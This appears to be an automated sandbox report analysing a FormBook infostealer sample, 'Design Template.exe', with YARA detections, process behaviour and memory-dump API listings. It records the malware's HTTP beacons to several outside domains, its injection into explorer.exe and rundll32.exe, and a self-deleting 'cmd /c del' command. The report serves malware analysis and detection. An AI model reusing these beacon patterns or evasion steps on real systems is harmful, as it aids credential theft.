                                                                              Host: www.chuanyangwenhua.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Apr 12, 2021 14:43:23.831491947 CEST7255INHTTP/1.1 404 Not Found
                                                                              Server: openresty
                                                                              Date: Mon, 12 Apr 2021 12:43:23 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 146
                                                                              Connection: close
                                                                              Set-Cookie: BAEID=FDD9965F60D324C96ADED23F19A33FCC; expires=Tue, 12-Apr-22 12:43:23 GMT; max-age=31536000; path=/; version=1
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                              Apr 12, 2021 14:43:24.032521963 CEST7256INHTTP/1.1 404 Not Found
                                                                              Server: openresty
                                                                              Date: Mon, 12 Apr 2021 12:43:23 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 146
                                                                              Connection: close
                                                                              Set-Cookie: BAEID=FDD9965F60D324C96ADED23F19A33FCC; expires=Tue, 12-Apr-22 12:43:23 GMT; max-age=31536000; path=/; version=1
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              6192.168.2.74972834.102.136.18080C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Apr 12, 2021 14:43:28.962619066 CEST7257OUTGET /ma3c/?nflpdH=xVJtBJipx&_h0PX=IYnhIGwcQmbdxEO5DsUkvq5x/f/PoDEr3kEuTATZH4q1+Xg6K+Y8FVJqSC6GxdnWJvbcnap46w== HTTP/1.1
                                                                              Host: www.bestflowersandgifts.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Apr 12, 2021 14:43:29.099579096 CEST7258INHTTP/1.1 403 Forbidden
                                                                              Server: openresty
                                                                              Date: Mon, 12 Apr 2021 12:43:29 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 275
                                                                              ETag: "60704793-113"
                                                                              Via: 1.1 google
                                                                              Connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              7192.168.2.74973334.102.136.18080C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Apr 12, 2021 14:43:39.946073055 CEST7302OUTGET /ma3c/?nflpdH=xVJtBJipx&_h0PX=6w2wX9052gwDzHc+6ODPhIZFPdBQiC5v+fUP1qbbipTXUM2PhMECBJTSXWpwe4MsJEjxMxxOZQ== HTTP/1.1
                                                                              Host: www.sci-mfg.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Apr 12, 2021 14:43:40.083059072 CEST7303INHTTP/1.1 403 Forbidden
                                                                              Server: openresty
                                                                              Date: Mon, 12 Apr 2021 12:43:40 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 275
                                                                              ETag: "607068c2-113"
                                                                              Via: 1.1 google
                                                                              Connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              8192.168.2.74973634.102.136.18080C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Apr 12, 2021 14:43:50.370038033 CEST7318OUTGET /ma3c/?nflpdH=xVJtBJipx&_h0PX=zjRNxAcCRCg7Q4faxm7O9/wlBfqcu26Ht8wCsETVdMApM4UO++TRNwkGPLPsxzY/h5O+ZiCdmw== HTTP/1.1
                                                                              Host: www.sexichef.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Apr 12, 2021 14:43:50.506458044 CEST7319INHTTP/1.1 403 Forbidden
                                                                              Server: openresty
                                                                              Date: Mon, 12 Apr 2021 12:43:50 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 275
                                                                              ETag: "60737c38-113"
                                                                              Via: 1.1 google
                                                                              Connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                              Code Manipulations

                                                                              Statistics

                                                                              CPU Usage

                                                                              Click to jump to process

                                                                              Memory Usage

                                                                              Click to jump to process

                                                                              High Level Behavior Distribution

                                                                              Click to dive into process behavior distribution

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              General

                                                                              Start time:14:41:27
                                                                              Start date:12/04/2021
                                                                              Path:C:\Users\user\Desktop\Design Template.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:'C:\Users\user\Desktop\Design Template.exe'
                                                                              Imagebase:0x400000
                                                                              File size:479232 bytes
                                                                              MD5 hash:56D56566623A2BC942141B56F9DD3DA5
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.280097303.0000000000613000.00000004.00000020.sdmp, Author: Joe Security
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.280097303.0000000000613000.00000004.00000020.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.280097303.0000000000613000.00000004.00000020.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              Reputation:low

                                                                              General

                                                                              Start time:14:41:46
                                                                              Start date:12/04/2021
                                                                              Path:C:\Users\user\Desktop\Design Template.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\Desktop\Design Template.exe
                                                                              Imagebase:0x400000
                                                                              File size:479232 bytes
                                                                              MD5 hash:56D56566623A2BC942141B56F9DD3DA5
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.329542692.0000000000D10000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.329542692.0000000000D10000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.329542692.0000000000D10000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              Reputation:low

                                                                              General

                                                                              Start time:14:41:49
                                                                              Start date:12/04/2021
                                                                              Path:C:\Windows\explorer.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:
                                                                              Imagebase:0x7ff662bf0000
                                                                              File size:3933184 bytes
                                                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              General

                                                                              Start time:14:42:06
                                                                              Start date:12/04/2021
                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\rundll32.exe
                                                                              Imagebase:0x1030000
                                                                              File size:61952 bytes
                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.502155001.0000000000720000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.502155001.0000000000720000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.502155001.0000000000720000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.502311123.0000000000750000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.502311123.0000000000750000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.502311123.0000000000750000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              Reputation:high

                                                                              General

                                                                              Start time:14:42:11
                                                                              Start date:12/04/2021
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:/c del 'C:\Users\user\Desktop\Design Template.exe'
                                                                              Imagebase:0x970000
                                                                              File size:232960 bytes
                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              General

                                                                              Start time:14:42:12
                                                                              Start date:12/04/2021
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff774ee0000
                                                                              File size:625664 bytes
                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              Disassembly

                                                                              Code Analysis

                                                                              Reset < >

                                                                                Executed Functions

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 58fe25780cbd1d5dd60044fa9f6225bcfda5603850e4de2d90baa676da930ecf
                                                                                • Instruction ID: 0e4acfaf2bc0e0c5250e6a290611991c2eff94b59f19ce5085c9185608f88020
                                                                                • Opcode Fuzzy Hash: 58fe25780cbd1d5dd60044fa9f6225bcfda5603850e4de2d90baa676da930ecf
                                                                                • Instruction Fuzzy Hash: A1B21BB1D00218EFEF14DF94CC45BEEB7B5AF88304F10959AE509AB280D778AA85CF55
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @$bHC$bHC
                                                                                • API String ID: 0-379616849
                                                                                • Opcode ID: cdb2f8260c3cfb50a0a7dfa647fcfbaac2fccda0868779c582bc9bfff14ce8ab
                                                                                • Instruction ID: 228f60f9be162a54ec86171d398c6a8fb46f68f7711e85f4697109cc14e47f7a
                                                                                • Opcode Fuzzy Hash: cdb2f8260c3cfb50a0a7dfa647fcfbaac2fccda0868779c582bc9bfff14ce8ab
                                                                                • Instruction Fuzzy Hash: D04130B4A50209BFDB14CF94CC86FDEB7B4AF48740F108558F555AB2C0D7B4AA44CB99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: CoCreateInstance$CoInitializeEx$SHCreateItemFromParsingName$SHGetSpecialFolderPathW$lizeEx
                                                                                • API String ID: 0-1941468094
                                                                                • Opcode ID: b3bfe5c6a802bc3f6c2faef9970a5cda9d26535018f11c8bca9472528f1fe093
                                                                                • Instruction ID: 1abd636e182a27311c98dd0ae47b0caf91cb69de68426162ff2a61f3b8dcef36
                                                                                • Opcode Fuzzy Hash: b3bfe5c6a802bc3f6c2faef9970a5cda9d26535018f11c8bca9472528f1fe093
                                                                                • Instruction Fuzzy Hash: 30E14470D08388DEEB11CBA4C84479DBFB26F19304F14919DE448AF382D7BA9A59C776
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • NtCreateFile.NTDLL(?,80100000,00000018,?,00000000,00000080,00000007,00000001,00000060,00000000,00000000), ref: 00434709
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID: @
                                                                                • API String ID: 823142352-2766056989
                                                                                • Opcode ID: fcce1b8f83ce6098c17e5add9eb751c495a580ee7a9faf8ac2add711d0234b4c
                                                                                • Instruction ID: 50a2565524186228f49046d7db69fc9055af216314393884cb3c1c256b49a57e
                                                                                • Opcode Fuzzy Hash: fcce1b8f83ce6098c17e5add9eb751c495a580ee7a9faf8ac2add711d0234b4c
                                                                                • Instruction Fuzzy Hash: 98411E75A40208BFEB14CF94CC85FEEB7B5AF48710F208559FA15AB2D0D7B4AA05CB94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @
                                                                                • API String ID: 0-2766056989
                                                                                • Opcode ID: 3cc6f16a382698ea9cc30287e394aa241eed86385e281fa8b7b9b80aab4f7af6
                                                                                • Instruction ID: 7daf56bdd95a51f40f1bf24ff7f1458a98e4ef1f58082935c3045c2a0acb2187
                                                                                • Opcode Fuzzy Hash: 3cc6f16a382698ea9cc30287e394aa241eed86385e281fa8b7b9b80aab4f7af6
                                                                                • Instruction Fuzzy Hash: D9515F70A50209EBEB10DFA4CC41FEE77B5AF4C700F109529F549EB280E775AA45CB55
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetVersion.KERNEL32(?,?,?,00431B57), ref: 00431BD3
                                                                                • GetProcessVersion.KERNELBASE(00000000,?,?,?,00431B57), ref: 00431C10
                                                                                • LoadCursorA.USER32 ref: 00431C3E
                                                                                • LoadCursorA.USER32 ref: 00431C49
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CursorLoadVersion$Process
                                                                                • String ID:
                                                                                • API String ID: 2246821583-0
                                                                                • Opcode ID: 9ef0c311a2055819bab3e13b0b634dab8ceb4500b74ab5ab51af9181cf52dd85
                                                                                • Instruction ID: 3914e1cd0e40f892f12fefa2992eef9613f070732c68f7a057d98c3d4a22ec50
                                                                                • Opcode Fuzzy Hash: 9ef0c311a2055819bab3e13b0b634dab8ceb4500b74ab5ab51af9181cf52dd85
                                                                                • Instruction Fuzzy Hash: 7E114CB1A40B608FD7649F3A988452ABBE5FB487057405D3FE18BC6B90D7B8E444CB54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 00435737
                                                                                • NtCreateSection.NTDLL(00000000,000F001F,00000000,00000000,00000002,01000000,?), ref: 0043576F
                                                                                • NtClose.NTDLL(?,?,00000001,?,00000030,00000000,?,00000001), ref: 00435803
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CloseCreateFileSectionWrite
                                                                                • String ID:
                                                                                • API String ID: 2349782792-0
                                                                                • Opcode ID: 701d89797e0bb8792af7d360e5ea09c4bc7bfdf99c1c12c2fa203f4917575bf1
                                                                                • Instruction ID: 525f56e15e2d80a870e9e9e489733885a9e8928b7a611378e6ba6dc6ec8cdbc7
                                                                                • Opcode Fuzzy Hash: 701d89797e0bb8792af7d360e5ea09c4bc7bfdf99c1c12c2fa203f4917575bf1
                                                                                • Instruction Fuzzy Hash: 6461F674A00609EFDB08DF84C885FAEBBB1BF48314F208159E8159B390D778EA95CF94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • NtClose.NTDLL(00000000), ref: 0043562C
                                                                                • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 00435695
                                                                                • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 004356A7
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
